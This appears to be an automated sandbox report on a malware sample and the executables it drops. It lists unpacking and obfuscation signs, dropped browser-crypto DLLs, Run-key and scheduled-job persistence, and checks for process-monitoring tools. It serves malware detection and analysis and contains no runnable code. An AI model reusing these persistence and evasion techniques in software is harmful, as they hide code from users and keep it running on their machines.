Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Unpacked PE file: 5.2.RoamingIJEGHJECFC.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\userAAKKKEBFCG.exe Unpacked PE file: 8.2.userAAKKKEBFCG.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 9.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 11.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 15.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 16.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 20.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Unpacked PE file: 24.2.8e8f4571c5.exe.560000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Unpacked PE file: 28.2.8e8f4571c5.exe.560000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
Source: userAAKKKEBFCG.exe.0.dr Static PE information: real checksum: 0x1e81e4 should be: 0x1dcf01
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
Source: axplong.exe.8.dr Static PE information: real checksum: 0x1e81e4 should be: 0x1dcf01
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .fufuc
Source: file.exe Static PE information: section name: .xixeray
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: hoxupgqj
Source: random[1].exe.0.dr Static PE information: section name: fapapsdz
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: hoxupgqj
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: fapapsdz
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .taggant
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .idata
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: zywzqxul
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: dpxiwhce
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe0.0.dr Static PE information: section name: .fufuc
Source: random[1].exe0.0.dr Static PE information: section name: .xixeray
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: hoxupgqj
Source: explorti.exe.5.dr Static PE information: section name: fapapsdz
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: zywzqxul
Source: axplong.exe.8.dr Static PE information: section name: dpxiwhce
Source: axplong.exe.8.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B536 push ecx; ret 0_2_6C70B549
Source: file.exe Static PE information: section name: .text entropy: 7.823258879693632
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.983843219488176
Source: random[1].exe.0.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: entropy: 7.983843219488176
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: entropy: 7.984877598028932
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: zywzqxul entropy: 7.955124114552355
Source: random[1].exe0.0.dr Static PE information: section name: .text entropy: 7.823258879693632
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.983843219488176
Source: explorti.exe.5.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: axplong.exe.8.dr Static PE information: section name: entropy: 7.984877598028932
Source: axplong.exe.8.dr Static PE information: section name: zywzqxul entropy: 7.955124114552355
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\userAAKKKEBFCG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\userAAKKKEBFCG.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
